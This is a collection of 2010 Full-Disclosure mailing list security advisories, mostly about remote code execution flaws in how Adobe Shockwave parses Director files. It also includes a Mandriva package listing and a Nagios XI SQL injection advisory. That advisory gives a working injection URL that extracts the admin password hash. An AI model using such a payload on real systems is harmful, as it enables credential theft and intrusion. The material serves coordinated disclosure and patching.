2010.0/x86_64/vte-0.22.2-1.1mdv2010.0.x86_64.rpm e3f61964adb4a8d6f09bc0896a4686f9 2010.0/SRPMS/vte-0.22.2-1.1mdv2010.0.src.rpm Mandriva Linux 2010.1: 03bc21bd81fff6da6f37afc88afc4cb2 2010.1/i586/libvte9-0.24.1-2.1mdv2010.1.i586.rpm 3ac8fbc00dd6ec5b230fd3811d6a3339 2010.1/i586/libvte-devel-0.24.1-2.1mdv2010.1.i586.rpm 881b06f90315338f08fb468e86332cf1 2010.1/i586/python-vte-0.24.1-2.1mdv2010.1.i586.rpm 6980d3c1d5feb501286eb8ba8096c916 2010.1/i586/vte-0.24.1-2.1mdv2010.1.i586.rpm 578fd4339c2d63b1162e0c5160e1a16f 2010.1/SRPMS/vte-0.24.1-2.1mdv2010.1.src.rpm Mandriva Linux 2010.1/X86_64: dd410314d1d2ee4e559ee7c60ff03fcb 2010.1/x86_64/lib64vte9-0.24.1-2.1mdv2010.1.x86_64.rpm 32a0f286397d2130e813d0b15e3582de 2010.1/x86_64/lib64vte-devel-0.24.1-2.1mdv2010.1.x86_64.rpm c947e661092ad638b30ff31eab30d01e 2010.1/x86_64/python-vte-0.24.1-2.1mdv2010.1.x86_64.rpm 6382062f784fe48fdbabd4b5e536c724 2010.1/x86_64/vte-0.24.1-2.1mdv2010.1.x86_64.rpm 578fd4339c2d63b1162e0c5160e1a16f 2010.1/SRPMS/vte-0.24.1-2.1mdv2010.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFMc/rCmqjQ0CJFipgRAn/oAJ0c4O36ngxve15ADqoWG69H3+YFmACffXep Ou35xQytEEhWMqa/ERalJrY=
[Full-disclosure] TPTI-10-10: Adobe Shockwave tSAC Chunk Invalid Seek Memory Corruption Remote Code Execution Vulnerability
TPTI-10-10: Adobe Shockwave tSAC Chunk Invalid Seek Memory Corruption Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-10-10 August 24, 2010 -- CVE ID: CVE-2010-2878 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within DIRAPIX.dll which is responsible for parsing the Director movies, a RIFF-based file format. The code directly uses a value from the file while seeking into a heap buffer. The process then attempts to write a NULL byte to the seeked address. By specifying a large enough value for this field, an attacker can force the process to seek beyond the allocated bounds of the buffer. This can be leveraged by an attacker to execute arbitrary code under the context of the user running the web browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-20.html -- Disclosure Timeline: 2010-08-11 - Vulnerability reported to vendor 2010-08-24 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Aaron Portnoy, Logan Brown, and Team lollersk8erz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TPTI-10-12: Adobe Shockwave TextXtra Allocator Integer Overflow Remote Code Execution Vulnerability
TPTI-10-12: Adobe Shockwave TextXtra Allocator Integer Overflow Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-10-12 August 24, 2010 -- CVE ID: CVE-2010-2879 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists due to a faulty allocation routine within the TextXtra.x32 module. This allocator allocates a buffer on the heap based on arithmetic involving a number of elements and a size of an individual element. As the fields come from the file, if either of them are large enough, the value used for the number of bytes to allocate can be made to overflow. As the return value is rarely checked any caller of this function can usually be made to overflow the returned buffer with user-supplied data. An attacker can leverage this to execute remote code under the context of the user running the browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-20.html -- Disclosure Timeline: 2010-08-11 - Vulnerability reported to vendor 2010-08-24 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Aaron Portnoy, Logan Brown, and Team Montreal Hotties ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TPTI-10-11: Adobe Shockwave tSAC Chunk Pointer Offset Memory Corruption Remote Code Execution Vulnerability
TPTI-10-11: Adobe Shockwave tSAC Chunk Pointer Offset Memory Corruption Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-10-11 August 24, 2010 -- CVE ID: CVE-2010-2874 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within DIRAPIX.dll which is responsible for parsing the Director movies, a RIFF-based file format. The code sign-extends a value from the input file and uses it as an offset to seek into a heap buffer before performing a write operation. By crafting particular values for this field, an attacker can force the process to seek beyond the allocated bounds of the buffer. This can be leveraged by an attacker to execute arbitrary code under the context of the user running the web browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-20.html -- Disclosure Timeline: 2010-08-11 - Vulnerability reported to vendor 2010-08-24 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Aaron Portnoy, Logan Brown, and Team lollersk8erz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TPTI-10-09: Adobe Shockwave CSWV Chunk Memory Corruption Remote Code Execution Vulnerability
TPTI-10-09: Adobe Shockwave CSWV Chunk Memory Corruption Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-10-09 August 24, 2010 -- CVE ID: CVE-2010-2877 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within IML32X.dll and DIRAPIX.dll which are responsible for parsing the Director movies, a RIFF-based file format. The code trusts a value from the file as a count and performs an endian-flipping loop on data in heap memory. If the value is large enough the process can be made to seek outside the bounds of the allocation and thus corrupt memory in a controlled fashion. This can be leveraged by an attacker to execute arbitrary code under the context of the user running the web browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-20.html -- Disclosure Timeline: 2010-08-11 - Vulnerability reported to vendor 2010-08-24 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Aaron Portnoy, Logan Brown, and Team lollersk8erz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TPTI-10-13: Adobe Shockwave Director tSAC Chunk Remote Code Execution Vulnerability
TPTI-10-13: Adobe Shockwave Director tSAC Chunk Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-10-13 August 24, 2010 -- CVE ID: CVE-2010-2866 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the code responsible for parsing Director's RIFF-based file format. While parsing the tSAC chunk, the DIRAPI module does not properly verify the signedness of a count value within an undocumented structure. By providing a large enough negative value a pointer can be miscalculated leading to memory corruption. This can be exploited by a remote attacker to execute arbitrary code under the context of the user running the web browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-20.html -- Disclosure Timeline: 2010-05-27 - Vulnerability reported to vendor 2010-08-24 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * TippingPoint FuzzBox as driven by Aaron Portnoy and Logan Brown ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TPTI-10-15: Adobe Shockwave Director mmap Trusted Chunk Size Remote Code Execution Vulnerability
TPTI-10-15: Adobe Shockwave Director mmap Trusted Chunk Size Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-10-15 August 24, 2010 -- CVE ID: CVE-2010-2870 -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the DIRAPIX module responsible for parsing the RIFF-based Director file format. When handling the mmap chunk, the process trusts the chunk size immediately following the fourCC value. It is passed to Ordinal exported by the IML32X module which is responsible for allocating a heap buffer for processing the rest of the chunk. If an incorrect size is provided, later memory copies can corrupt data beyond the allocated buffer. This can be abused to execute remote code under the context of the user running the web browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-20.html -- Disclosure Timeline: 2010-05-27 - Vulnerability reported to vendor 2010-08-24 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * TippingPoint FuzzBox as driven by Aaron Portnoy and Logan Brown ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TPTI-10-14: Adobe Shockwave Director rcsL Chunk Pointer Offset Remote Code Execution Vulnerability
TPTI-10-14: Adobe Shockwave Director rcsL Chunk Pointer Offset Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-10-14 August 24, 2010 -- CVE ID: CVE-2010-2867 -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the code responsible for parsing the Director RIFF based file format. While handling the rcsL chunk, code within DIRAPIX sign-extends a return value from a call to Ordinal1412 within the IML32X module. This ordinal is responsible for unmarshalling a WORD value from the RIFF chunk. If the value is signed, DIRAPIX sign-extends the value, performs arithmetic on it, and then proceeds to use it as an offset into a heap-based buffer. By supplying any of a specific range of values, an attacker can exploit this condition to execute arbitrary code under the context of the user running the web browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-20.html -- Disclosure Timeline: 2010-05-27 - Vulnerability reported to vendor 2010-08-24 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * TippingPoint FuzzBox as driven by Aaron Portnoy and Logan Brown ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-160: Adobe Shockwave Player Director File FFFFFF45 Record Processing Remote Code Execution Vulnerability
ZDI-10-160: Adobe Shockwave Player Director File FF45 Record Processing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-160 August 24, 2010 -- CVE ID: CVE-2010-2871 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10286. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the application's support for 3D objects. While parsing the 0xFF45 RIFF record type, the process performs arithmetic on a size value and uses the result for a heap-based allocation. By specifying a large enough value an attacker can force the integer to wrap and thus the process will under-allocate the buffer. This memory is later copied into using a different size value which results in object corruption that can be leveraged to execute arbitrary code under the context of the user running the browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-20.html -- Disclosure Timeline: 2010-06-30 - Vulnerability reported to vendor 2010-08-24 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-161: Adobe Shockwave Director PAMI Chunk Remote Code Execution Vulnerability
ZDI-10-161: Adobe Shockwave Director PAMI Chunk Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-161 August 24, 2010 -- CVE ID: CVE-2010-2872 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9969. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the code responsible for parsing Director files. When the application parses the pami RIFF chunk, it trusts an offset value and seeks into the file data. If provided with signed values in the data at the given offset, the process can be made to incorrectly calculate a pointer and operate on the data at it's location. This can be abused by an attacker to execute arbitrary code under the context of the user running the browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-20.html -- Disclosure Timeline: 2010-06-30 - Vulnerability reported to vendor 2010-08-24 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-162: Adobe Shockwave Director rcsL Chunk Remote Code Execution Vulnerability
ZDI-10-162: Adobe Shockwave Director rcsL Chunk Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-162 August 24, 2010 -- CVE ID: CVE-2010-2873 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of the rcsL RIFF chunk within director files of extension DIR or DCR. While parsing this undocumented structure, the application blindly trusts an offset value and uses it while operating on heap memory. An attacker can abuse this to corrupt a function pointer which can lead to arbitrary code execution under the context of the user running the web browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-20.html -- Disclosure Timeline: 2010-06-30 - Vulnerability reported to vendor 2010-08-24 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-163: Adobe Shockwave Director tSAC Chunk Parsing Remote Code Execution Vulnerability
ZDI-10-163: Adobe Shockwave Director tSAC Chunk Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-163 August 24, 2010 -- CVE ID: CVE-2010-2874 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of the undocumented tSAC RIFF chunk. By setting a specified field within this structure to NULL, the application fails to initialize an object pointer. This uninitialized pointer is later called which causes the application to jump into random heap memory. By crafting the applications memory state an attacker can utilize this issue to execute arbitrary code under the context of the user running the browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-20.html -- Disclosure Timeline: 2010-06-30 - Vulnerability reported to vendor 2010-08-24 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-164: Adobe Shockwave Player Director File FFFFFF88 Record Processing Remote Code Execution Vulnerability
ZDI-10-164: Adobe Shockwave Player Director File FF88 Record Processing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-164 August 24, 2010 -- CVE ID: CVE-2010-2876 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10285. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the code responsible for parsing .dir and .dcr files. The director file format is RIFF based. While parsing an undocumented record of type 0xFFF8 the process trusts two user supplied word values when performing arithmetic to calculate a heap buffer size. By specifying large enough values an integer wrap can occur. The allocated heap buffer can later be overflowed with user supplied data. This can be leveraged by attackers to execute remote code under the context of the user running the browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-20.html -- Disclosure Timeline: 2010-07-20 - Vulnerability reported to vendor 2010-08-24 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Nagios XI users.php SQL Injection
Nagios XI users.php SQL Injection Advisory Information Advisory ID: NGENUITY-2010-008 Date published: 8/24/2010 Vulnerability Information Class: SQL Injection (SQLi) Software Description Nagios XI is the commercial / enterprise version of the open source Nagios project. Vulnerability Description Nagios XI prior to version 2009R1.3 is vulnerable to SQL Injection. It is possible for specially designed queries to extract data via the database error messages. Authentication and access to users.php is required. It is possible to also use this SQL injection has a remote XSS vector as the error message is not properly sanitized. Technical Description The records variable on the users.php command is not properly sanitized and allows for injection of SQL commands. Stacked queries are also allowed into the postgres database. http://example.com/nagiosxi/admin/users.php?records=int8((select password from xi_users where username= CHR(110)||CHR(97)||CHR(103)||CHR(105)||CHR(111)||CHR(115)||CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110)))sortby=usernamesortorder=ascsearch=page=1 The password hash of the nagiosadmin user would be displayed in the error message as a result of this query. Credits This vulnerability was discovered by Adam Baldwin Original Advisory: http://ngenuity-is.com/advisories/2010/aug/24/nagios-xi-usersphp-sql-injection/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 08.24.10: Adobe Shockwave Player Memory Corruption Vulnerability
iDefense Security Advisory 08.24.10
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 24, 2010
I. BACKGROUND
Adobe Shockwave Player is a popular Web browser plugin. It is available
for multiple Web browsers and platforms, including Windows, and MacOS.
Shockwave Player enables Web browsers to display rich multimedia
content in the form of Shockwave videos. For more information, see the
vendor's site found at the following link:
http://get.adobe.com/shockwave
II. DESCRIPTION
Remote exploitation of a memory corruption vulnerability in Adobe
Systems Inc.'s Shockwave Player could allow an attacker to execute
arbitrary code with the privileges of the current user. BR BR The
vulnerability takes place during the processing of a tSAC chunk within
an Adobe Director file. A length value is read from the tSAC chunk and
a signed comparison is made against the length value. If the length
value is negative, a memory address is incorrectly calculated and a
null byte is written to the memory address. This condition may lead to
arbitrary code execution.
III. ANALYSIS
Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user viewing the Web page. To exploit
this vulnerability, a targeted user must load a malicious Adobe
Director file created by an attacker. An attacker typically
accomplishes this via social engineering or injecting content into a
compromised, trusted site.
IV. DETECTION
Shockwave Player 11.5.7.609 and earlier versions for Windows and
Macintosh are vulnerable.
V. WORKAROUND
The killbit for the Shockwave Player ActiveX control can be set by
creating the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX
Compatibility\{233C1507-6A77-46A4-9443-F871F945D258} BR BR Under
this key create a new DWORD value called Compatibility Flags and set
its hexadecimal value to 400. BR BR To re-enable Shockwave Player
set the Compatibility Flags value to 0.
VI. VENDOR RESPONSE
Adobe has released a fix which addresses this issue. Information about
downloadable vendor updates can be found by clicking on the URLs shown.
http://get.adobe.com/shockwave/
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2010-2875 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
07/07/2010 Initial Vendor Notification
07/07/2010 Initial Vendor Reply
08/24/2010 Coordinated Public Disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2010 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
